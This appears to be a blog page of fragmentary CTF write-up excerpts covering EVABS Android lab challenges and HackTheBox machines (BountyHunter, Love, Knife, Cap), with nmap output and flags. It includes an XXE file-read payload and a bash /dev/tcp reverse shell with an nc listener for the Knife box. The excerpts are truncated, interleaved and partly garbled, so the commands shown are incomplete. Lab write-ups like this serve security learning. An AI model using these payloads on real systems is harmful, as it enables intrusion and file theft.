EVABS Challenge 6

$adb shellvbox86p:/data/data/com.revo.evabs/databases # ls $adb pull /data/data/com.revo.evabs/databases/MAINFRAME_ACCESS . $ ls $ file MAINFRAME_ACCESS EVABS{sqlite_is_not_safe}

EVABS Challenge 5

$ adb shellvbox86p:/data/data/com.revo.evabs # ls vbox86p:/data/data/com.revo.evabs # cd shared_prefsvbox86p:/data/data/com.revo.evabs/shared_prefs # ls vbox86p:/data/data/com.revo.evabs/shared_prefs # cat DETAILS.xml EVABS{shar3d_pr3fs_c0uld_be_c0mpromiz3ds}

EVABS Challenge 4


HTB BountyHunter

$ nmap -A -T4 -v Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) As we can observe in Burp, data is URL+base64 encoded. It’s XML data, so could try an XXE. Using Cyberchef ( on we also find : <!DOCTYPE replace [<!ENTITY xxe SYSTEM «php://filter/convert.base64-encode/resource=file_to_use»> ]> We can use to check other files

EVABS Challenge 3

HTB Love

$ nmap -A -p- -T4 Open ports: 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) ssl-cert: Subject: 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd

EVABS Challenge 2


HTB Knife

$ nmap $ nmap -p- -v $ whatweb $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/ $ python3 $ id Using this exploit we get a reverse but it is not very useful, we can try to get a better one. $ python3 -u -c «/bin/bash -c ‘/bin/bash -i >& /dev/tcp/ 0>&1′»$ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /homejames@knife:/home$ ls james@knife:/home$

EVABS (Extremely Vulnerable Android Labs) Challenge 1

According to An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners. The effort is to introduce beginners with very limited or zero knowledge to some of the major and commonly found real-world based Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach and in each level, the player learns a new


$ nmap -A -p- -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn Dashboard Security Snapshot IP Config Network status Security Snapshot Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if